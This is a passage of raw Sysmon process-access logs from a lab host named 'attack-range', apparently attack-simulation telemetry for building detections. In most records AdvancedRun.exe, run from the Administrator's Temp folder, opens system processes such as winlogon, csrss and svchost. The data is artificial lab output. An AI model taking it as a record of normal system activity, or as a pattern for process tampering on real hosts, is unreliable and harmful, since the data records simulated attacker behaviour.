20:16:15.208{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077189Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.207{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077188Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.207{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077187Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.207{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077186Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.205{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077185Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.205{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077184Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.205{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077183Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.205{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077182Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.205{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077181Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.205{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004077180Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.203{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077179Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.203{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077178Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.202{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077177Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.202{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077176Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.201{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077175Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.200{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.200{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077173Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.199{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 